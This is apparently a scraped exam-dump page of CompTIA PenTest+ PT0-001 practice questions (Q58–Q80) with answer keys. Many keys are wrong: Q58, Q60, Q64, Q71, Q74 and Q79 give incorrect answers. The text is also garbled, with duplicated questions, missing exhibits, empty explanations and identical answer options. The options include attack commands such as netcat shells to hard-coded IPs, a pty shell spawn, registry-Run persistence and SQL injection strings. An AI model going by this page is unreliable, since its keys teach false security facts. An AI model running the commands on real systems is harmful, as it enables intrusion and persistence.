Latest [Sep 07, 2021] CompTIA PT0-001 Exam Practice Test To Gain Brilliant Result [Q58-Q80]


Take a Leap Forward in Your Career by Earning CompTIA PT0-001

NEW QUESTION 58
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information stored on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

  • A. Install host-based intrusion detection
  • B. Randomize the credentials used to log in
  • C. Perform system hardening
  • D. Implement input normalization

Answer: C

 

NEW QUESTION 59
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

  • A. Configuration files
  • B. Common libraries
  • C. ASLR bypass
  • D. Sandbox escape

Answer: C

 

NEW QUESTION 60
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass":
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

  • A. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw
  • B. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'
  • C. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path "/home/user". Then run changepass
  • D. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass

Answer: B

 

NEW QUESTION 61
Performance based
You are a penetration tester reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Answer:

Explanation:
Step 1: Generate a Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Install re-issued certificate on the server
Step 4: Remove Certificate from Server
 

NEW QUESTION 62
A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

  • A. Download the GHOST file to a Windows system and compile
    gcc -o GHOST GHOST.c
    test i:
    ./GHOST
  • B. Download the GHOST file to a Linux system and compile
    gcc -o GHOST.c
    test i:
    ./GHOST
  • C. Download the GHOST file to a Linux system and compile
    gcc -o GHOST
    test i:
    ./GHOST
  • D. Download the GHOST file to a Windows system and compile
    gcc -o GHOST
    test i:
    ./GHOST

Answer: A

 

NEW QUESTION 63
A penetration tester is designing a phishing campaign and wants to build a list of users for the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO.)

  • A. Query an Internet WHOIS database.
  • B. Socially engineer the corporate call center.
  • C. Search posted job listings.
  • D. Scrape the company website.
  • E. Harvest users from social networking sites.

Answer: A,C

 

NEW QUESTION 64
Black box penetration testing strategy provides the tester with:

  • A. a target list
  • B. source code
  • C. privileged credentials
  • D. a network diagram

Answer: C

Explanation:
References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing

 

NEW QUESTION 65
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

  • A. MAC address of the client
  • B. MAC address of the gateway
  • C. MAC address of the web server
  • D. MAC address of the domain controller

Answer: B

 

NEW QUESTION 66
A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?

  • A. 1=1 or b--
  • B. 1=1 or a--
  • C. 1=1 or 2--
  • D. a=1 or 1--

Answer: D

 

NEW QUESTION 67
Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?

  • A. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
    1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
  • B. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
    1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
  • C. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
    1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
  • D. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
    1=1 AND select username from testbank.custinfo where username like 'Joe'&amount=200

Answer: B

 

NEW QUESTION 68
Given the following script:

Which of the following BEST describes the purpose of this script?

  • A. Keystroke monitoring
  • B. Event logging
  • C. Debug message collection
  • D. Log collection

Answer: A

 

NEW QUESTION 69
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?

  • A. nc 100.170.60.5 8080 /bin/sh
  • B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
  • C. fpipe.exe -l 8080 -r 80 100.170.60.5
  • D. nmap -sS -A -f 100.170.60.5

Answer: B

 

NEW QUESTION 70
Performance based
You are a penetration tester reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Answer:

Explanation:

 

NEW QUESTION 71
A penetration tester runs the following from a compromised box: python -c 'import pty;pty.spawn("/bin/bash")'. Which of the following actions is the tester taking?

  • A. Upgrading the shell
  • B. Creating a sandbox
  • C. Capturing credentials
  • D. Removing the Bash history

Answer: D

 

NEW QUESTION 72
Black box penetration testing strategy provides the tester with:

  • A. a target list
  • B. source code
  • C. privileged credentials
  • D. a network diagram

Answer: C

Explanation:
References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing

 

NEW QUESTION 73
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

  • A. From the local computer, run the following command
    ssh -L4444 : 127.0.01:6000 -% [email protected] xterm
  • B. From the local computer, run the following command
    nc -l -p 6000
    Then, from the remote computer, run the following command
    xterm | nc 192.168.1.10 6000
  • C. From the remote computer, run the following commands:
    Export IHOST 192.168.1.10:0.0
    xhost+
    Terminal
  • D. From the local computer, run the following command
    ssh -r6000 : 127.0.01:4444 -p 6000 [email protected] "xhost+; xterm"

Answer: C

 

NEW QUESTION 74
A penetration tester observes that the content security policy header is missing during a web application penetration test.
Which of the following techniques would the penetration tester MOST likely perform?

  • A. Directory traversal attack
  • B. Command injection attack
  • C. Remote file inclusion attack
  • D. Clickjacking attack

Answer: A

Explanation:
References: https://geekflare.com/http-header-implementation/

 

NEW QUESTION 75
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

  • A. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
  • B. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.
  • C. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
  • D. Create a scheduled task to call C:\windows\system32\drivers\etc\hosts.
  • E. Create a fake service in Windows called RTAudio to execute manually.
  • F. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.

Answer: B,C

 

NEW QUESTION 76
A penetration tester successfully exploits a Windows host and dumps the hashes. Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

  • A. Option A
  • B. Option D
  • C. Option B
  • D. Option C

Answer: B

 

NEW QUESTION 77
A penetration tester successfully exploits a Windows host and dumps the hashes. Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

  • A. Option A
  • B. Option D
  • C. Option B
  • D. Option C

Answer: B

 

NEW QUESTION 78
Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

  • A. SNMP brute forcing
  • B. ARP spoofing
  • C. SMTP relay
  • D. DNS cache poisoning

Answer: A

 

NEW QUESTION 79
A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?

  • A. Detailed service configurations
  • B. Unpatched third-party software
  • C. Weak access control configurations
  • D. Exploits for vulnerabilities found

Answer: D

 

NEW QUESTION 80
......
